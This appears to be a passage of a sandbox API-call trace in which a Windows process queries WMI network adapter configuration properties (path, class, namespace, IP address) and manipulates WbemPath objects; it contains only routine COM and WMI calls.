	[0068.817] IWbemClassObject:Get (in: This=0x233e12e36f0, wszName="__GENUS", lFlags=0, pVal=0x350199d3f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d3ec*=0, plFlavor=0x350199d3e8*=0 | out: pVal=0x350199d3f0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x350199d3ec*=3, plFlavor=0x350199d3e8*=64) returned 0x0
	[0068.817] IWbemClassObject:Get (in: This=0x233e12e36f0, wszName="__PATH", lFlags=0, pVal=0x350199d390*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199d38c*=0, plFlavor=0x350199d388*=0 | out: pVal=0x350199d390*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=3", varVal2=0x0), pType=0x350199d38c*=8, plFlavor=0x350199d388*=64) returned 0x0
	[0068.817] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=3") returned 0x3f
	[0068.818] CoGetObjectContext (in: riid=0x350199d328*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350199d320 | out: ppv=0x350199d320*=0x233e121be30) returned 0x0
	[0068.818] IComThreadingInfo:GetCurrentApartmentType (in: This=0x233e121be30, pAptType=0x350199d340 | out: pAptType=0x350199d340*=1) returned 0x0
	[0068.818] IUnknown:QueryInterface (in: This=0x233e121be30, riid=0x233e4523c48*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x350199d448 | out: ppvObject=0x350199d448*=0x0) returned 0x80004002
	[0068.818] IUnknown:Release (This=0x233e121be30) returned 0x2
	[0068.818] CoGetClassObject (in: rclsid=0x233fc685dd8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffbf57cd250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350199c9b0 | out: ppv=0x350199c9b0*=0x233fc704a20) returned 0x0
	[0068.819] WbemDefPath:IUnknown:QueryInterface (in: This=0x233fc704a20, riid=0x7ffbf57cd2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x350199c6c0 | out: ppvObject=0x350199c6c0*=0x0) returned 0x80004002
	[0068.819] WbemDefPath:IClassFactory:CreateInstance (in: This=0x233fc704a20, pUnkOuter=0x0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c6a8 | out: ppvObject=0x350199c6a8*=0x233e3a02810) returned 0x0
	[0068.819] IUnknown:QueryInterface (in: This=0x233e3a02810, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c5b0 | out: ppvObject=0x350199c5b0*=0x233e3a02810) returned 0x0
	[0068.819] IUnknown:QueryInterface (in: This=0x233e3a02810, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x350199c630 | out: ppvObject=0x350199c630*=0x0) returned 0x80004002
	[0068.819] IUnknown:AddRef (This=0x233e3a02810) returned 0x3
	[0068.819] CoGetContextToken (in: pToken=0x350199c280 | out: pToken=0x350199c280) returned 0x0
	[0068.820] IUnknown:QueryInterface (in: This=0x233e3a02810, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c240 | out: ppvObject=0x350199c240*=0x233fc704c40) returned 0x0
	[0068.820] IMarshal:GetUnmarshalClass (in: This=0x233fc704c40, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x350199c270 | out: pCid=0x350199c270) returned 0x0
	[0068.820] IUnknown:Release (This=0x233fc704c40) returned 0x3
	[0068.820] CoGetContextToken (in: pToken=0x350199c250 | out: pToken=0x350199c250) returned 0x0
	[0068.820] IUnknown:AddRef (This=0x233e3a02810) returned 0x4
	[0068.820] IUnknown:QueryInterface (in: This=0x233e3a02810, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c368 | out: ppvObject=0x350199c368*=0x0) returned 0x80004002
	[0068.820] IUnknown:Release (This=0x233e3a02810) returned 0x3
	[0068.820] IUnknown:Release (This=0x233e3a02810) returned 0x2
	[0068.821] WbemDefPath:IUnknown:Release (This=0x233fc704a20) returned 0x0
	[0068.821] IUnknown:Release (This=0x233e3a02810) returned 0x1
	[0068.821] CoGetContextToken (in: pToken=0x350199cf80 | out: pToken=0x350199cf80) returned 0x0
	[0068.821] CoGetContextToken (in: pToken=0x350199cec0 | out: pToken=0x350199cec0) returned 0x0
	[0068.821] IUnknown:AddRef (This=0x233e3a02810) returned 0x2
	[0068.821] IUnknown:QueryInterface (in: This=0x233e3a02810, riid=0x350199d000*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x350199cfe0 | out: ppvObject=0x350199cfe0*=0x233e3a02810) returned 0x0
	[0068.821] IUnknown:Release (This=0x233e3a02810) returned 0x2
	[0068.822] IUnknown:Release (This=0x233e3a02810) returned 0x1
	[0068.822] CoGetContextToken (in: pToken=0x350199d100 | out: pToken=0x350199d100) returned 0x0
	[0068.822] CoGetContextToken (in: pToken=0x350199d040 | out: pToken=0x350199d040) returned 0x0
	[0068.822] IUnknown:AddRef (This=0x233e3a02810) returned 0x2
	[0068.822] IUnknown:QueryInterface (in: This=0x233e3a02810, riid=0x350199d180*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x350199d160 | out: ppvObject=0x350199d160*=0x233e3a02810) returned 0x0
	[0068.822] IUnknown:Release (This=0x233e3a02810) returned 0x2
	[0068.822] IUnknown:AddRef (This=0x233e3a02810) returned 0x3
	[0068.822] IWbemPath:SetText (This=0x233e3a02810, uMode=0x4, pszPath="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=3") returned 0x0
	[0068.822] IUnknown:Release (This=0x233e3a02810) returned 0x2
	[0068.823] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199d3c0 | out: puCount=0x350199d3c0*=0x2) returned 0x0
	[0068.823] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199d3c0*=0x0, pszText=0x0 | out: puBuffLength=0x350199d3c0*=0x17, pszText=0x0) returned 0x0
	[0068.823] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199d3c0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199d3c0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.823] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199ce60 | out: puCount=0x350199ce60*=0x2) returned 0x0
	[0068.823] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199ce60*=0x0, pszText=0x0 | out: puBuffLength=0x350199ce60*=0x17, pszText=0x0) returned 0x0
	[0068.823] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199ce60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199ce60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.823] IWbemClassObject:Get (in: This=0x233e12e36f0, wszName="__NAMESPACE", lFlags=0, pVal=0x350199ce50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199ce4c*=0, plFlavor=0x350199ce48*=0 | out: pVal=0x350199ce50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x350199ce4c*=8, plFlavor=0x350199ce48*=64) returned 0x0
	[0068.823] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0068.824] IWbemClassObject:Get (in: This=0x233e12e36f0, wszName="__NAMESPACE", lFlags=0, pVal=0x350199ce60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199ce5c*=8, plFlavor=0x350199ce58*=64 | out: pVal=0x350199ce60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x350199ce5c*=8, plFlavor=0x350199ce58*=64) returned 0x0
	[0068.824] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0068.824] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199ce60 | out: puCount=0x350199ce60*=0x2) returned 0x0
	[0068.824] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199ce60*=0x0, pszText=0x0 | out: puBuffLength=0x350199ce60*=0x17, pszText=0x0) returned 0x0
	[0068.824] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199ce60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199ce60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.824] IWbemClassObject:Get (in: This=0x233e12e36f0, wszName="__CLASS", lFlags=0, pVal=0x350199ce50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199ce4c*=0, plFlavor=0x350199ce48*=0 | out: pVal=0x350199ce50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0x350199ce4c*=8, plFlavor=0x350199ce48*=64) returned 0x0
	[0068.824] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0068.824] IWbemClassObject:Get (in: This=0x233e12e36f0, wszName="__CLASS", lFlags=0, pVal=0x350199ce60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199ce5c*=8, plFlavor=0x350199ce58*=64 | out: pVal=0x350199ce60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0x350199ce5c*=8, plFlavor=0x350199ce58*=64) returned 0x0
	[0068.824] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0068.824] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199c8f0 | out: puCount=0x350199c8f0*=0x2) returned 0x0
	[0068.824] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8f0*=0x0, pszText=0x0 | out: puBuffLength=0x350199c8f0*=0x17, pszText=0x0) returned 0x0
	[0068.824] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8f0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199c8f0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.825] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199c8f0 | out: puCount=0x350199c8f0*=0x2) returned 0x0
	[0068.825] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8f0*=0x0, pszText=0x0 | out: puBuffLength=0x350199c8f0*=0x17, pszText=0x0) returned 0x0
	[0068.825] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8f0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199c8f0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.825] IWbemClassObject:GetNames (in: This=0x233e12e36f0, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x350199c8e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x350199c8e0 | out: pNames=0x350199c8e0*="\x01ƀ\x08") returned 0x0
	[0068.825] SafeArrayGetDim (psa=0x233fc684160) returned 0x1
	[0068.825] IWbemClassObject:Get (in: This=0x233e12e36f0, wszName="__GENUS", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x350199c8dc*=3, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.825] IWbemClassObject:Get (in: This=0x233e12e36f0, wszName="__CLASS", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.825] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0068.825] IWbemClassObject:Get (in: This=0x233e12e36f0, wszName="__SUPERCLASS", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.825] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0068.826] IWbemClassObject:Get (in: This=0x233e12e36f0, wszName="__DYNASTY", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.826] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0068.826] IWbemClassObject:Get (in: This=0x233e12e36f0, wszName="__RELPATH", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration.Index=3", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.826] SysStringLen (param_1="Win32_NetworkAdapterConfiguration.Index=3") returned 0x29
	[0068.826] IWbemClassObject:Get (in: This=0x233e12e36f0, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3d, varVal2=0x0), pType=0x350199c8dc*=3, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.826] IWbemClassObject:Get (in: This=0x233e12e36f0, wszName="__DERIVATION", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233fc684a20*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233fc644740, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x350199c8dc*=8200, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.826] IWbemClassObject:Get (in: This=0x233e12e36f0, wszName="__SERVER", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="X2VS1CUM", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.826] SysStringLen (param_1="X2VS1CUM") returned 0x8
	[0068.826] IWbemClassObject:Get (in: This=0x233e12e36f0, wszName="__NAMESPACE", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.826] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0068.827] IWbemClassObject:Get (in: This=0x233e12e36f0, wszName="__PATH", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=3", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.827] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=3") returned 0x3f
	[0068.827] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199c980 | out: puCount=0x350199c980*=0x2) returned 0x0
	[0068.827] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c980*=0x0, pszText=0x0 | out: puBuffLength=0x350199c980*=0x17, pszText=0x0) returned 0x0
	[0068.827] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c980*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199c980*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.827] IWbemClassObject:Get (in: This=0x233e12e36f0, wszName="IPADDREss", lFlags=0, pVal=0x350199c970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c96c*=0, plFlavor=0x350199c968*=0 | out: pVal=0x350199c970*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c96c*=8200, plFlavor=0x350199c968*=32) returned 0x0
	[0068.827] IWbemClassObject:Get (in: This=0x233e12e36f0, wszName="IPADDREss", lFlags=0, pVal=0x350199cba0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199cb9c*=8200, plFlavor=0x350199cb98*=32 | out: pVal=0x350199cba0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199cb9c*=8200, plFlavor=0x350199cb98*=32) returned 0x0
	[0068.827] CoTaskMemAlloc (cb=0x8) returned 0x233fc6447e0
	[0068.827] IEnumWbemClassObject:Next (in: This=0x233fc6f4ed0, lTimeout=-1, uCount=0x1, apObjects=0x233fc6447e0, puReturned=0x350199d478 | out: apObjects=0x233fc6447e0*=0x0, puReturned=0x350199d478*=0x0) returned 0x1
	[0068.828] CoTaskMemFree (pv=0x233fc6447e0) 
	[0068.829] CoGetContextToken (in: pToken=0x350199d200 | out: pToken=0x350199d200) returned 0x0
	[0068.829] IUnknown:Release (This=0x233fc6f59c8) returned 0x1
	[0068.829] IUnknown:Release (This=0x233fc6f4ed0) returned 0x0
	[0068.840] CoGetObjectContext (in: riid=0x350199d118*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350199d110 | out: ppv=0x350199d110*=0x233e121be30) returned 0x0
	[0068.840] IComThreadingInfo:GetCurrentApartmentType (in: This=0x233e121be30, pAptType=0x350199d130 | out: pAptType=0x350199d130*=1) returned 0x0
	[0068.840] IUnknown:QueryInterface (in: This=0x233e121be30, riid=0x233e4523c48*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x350199d238 | out: ppvObject=0x350199d238*=0x0) returned 0x80004002
	[0068.840] IUnknown:Release (This=0x233e121be30) returned 0x2
	[0068.841] CoGetClassObject (in: rclsid=0x233fc685dd8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffbf57cd250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350199c7a0 | out: ppv=0x350199c7a0*=0x233fc704260) returned 0x0
	[0068.841] WbemDefPath:IUnknown:QueryInterface (in: This=0x233fc704260, riid=0x7ffbf57cd2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x350199c4b0 | out: ppvObject=0x350199c4b0*=0x0) returned 0x80004002
	[0068.841] WbemDefPath:IClassFactory:CreateInstance (in: This=0x233fc704260, pUnkOuter=0x0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c498 | out: ppvObject=0x350199c498*=0x233e3a01cd0) returned 0x0
	[0068.841] IUnknown:QueryInterface (in: This=0x233e3a01cd0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c3a0 | out: ppvObject=0x350199c3a0*=0x233e3a01cd0) returned 0x0
	[0068.841] IUnknown:QueryInterface (in: This=0x233e3a01cd0, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x350199c420 | out: ppvObject=0x350199c420*=0x0) returned 0x80004002
	[0068.841] IUnknown:AddRef (This=0x233e3a01cd0) returned 0x3
	[0068.841] CoGetContextToken (in: pToken=0x350199c070 | out: pToken=0x350199c070) returned 0x0
	[0068.841] IUnknown:QueryInterface (in: This=0x233e3a01cd0, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c030 | out: ppvObject=0x350199c030*=0x233fc704860) returned 0x0
	[0068.842] IMarshal:GetUnmarshalClass (in: This=0x233fc704860, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x350199c060 | out: pCid=0x350199c060) returned 0x0
	[0068.842] IUnknown:Release (This=0x233fc704860) returned 0x3
	[0068.842] CoGetContextToken (in: pToken=0x350199c040 | out: pToken=0x350199c040) returned 0x0
	[0068.842] IUnknown:AddRef (This=0x233e3a01cd0) returned 0x4
	[0068.842] IUnknown:QueryInterface (in: This=0x233e3a01cd0, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c158 | out: ppvObject=0x350199c158*=0x0) returned 0x80004002
	[0068.842] IUnknown:Release (This=0x233e3a01cd0) returned 0x3
	[0068.842] IUnknown:Release (This=0x233e3a01cd0) returned 0x2
	[0068.842] WbemDefPath:IUnknown:Release (This=0x233fc704260) returned 0x0
	[0068.842] IUnknown:Release (This=0x233e3a01cd0) returned 0x1
	[0068.842] CoGetContextToken (in: pToken=0x350199cd70 | out: pToken=0x350199cd70) returned 0x0
	[0068.842] CoGetContextToken (in: pToken=0x350199ccb0 | out: pToken=0x350199ccb0) returned 0x0
	[0068.842] IUnknown:AddRef (This=0x233e3a01cd0) returned 0x2
	[0068.842] IUnknown:QueryInterface (in: This=0x233e3a01cd0, riid=0x350199cdf0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x350199cdd0 | out: ppvObject=0x350199cdd0*=0x233e3a01cd0) returned 0x0
	[0068.842] IUnknown:Release (This=0x233e3a01cd0) returned 0x2
	[0068.842] IUnknown:Release (This=0x233e3a01cd0) returned 0x1
	[0068.842] CoGetContextToken (in: pToken=0x350199cef0 | out: pToken=0x350199cef0) returned 0x0
	[0068.842] CoGetContextToken (in: pToken=0x350199ce30 | out: pToken=0x350199ce30) returned 0x0
	[0068.842] IUnknown:AddRef (This=0x233e3a01cd0) returned 0x2
	[0068.842] IUnknown:QueryInterface (in: This=0x233e3a01cd0, riid=0x350199cf70*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x350199cf50 | out: ppvObject=0x350199cf50*=0x233e3a01cd0) returned 0x0
	[0068.843] IUnknown:Release (This=0x233e3a01cd0) returned 0x2
	[0068.843] IUnknown:AddRef (This=0x233e3a01cd0) returned 0x3
	[0068.843] IWbemPath:SetText (This=0x233e3a01cd0, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.843] IUnknown:Release (This=0x233e3a01cd0) returned 0x2
	[0068.843] IWbemPath:GetNamespaceCount (in: This=0x233e3a01cd0, puCount=0x350199d200 | out: puCount=0x350199d200*=0x2) returned 0x0
	[0068.843] IWbemPath:GetText (in: This=0x233e3a01cd0, lFlags=4, puBuffLength=0x350199d200*=0x0, pszText=0x0 | out: puBuffLength=0x350199d200*=0x17, pszText=0x0) returned 0x0
	[0068.843] IWbemPath:GetText (in: This=0x233e3a01cd0, lFlags=4, puBuffLength=0x350199d200*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199d200*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
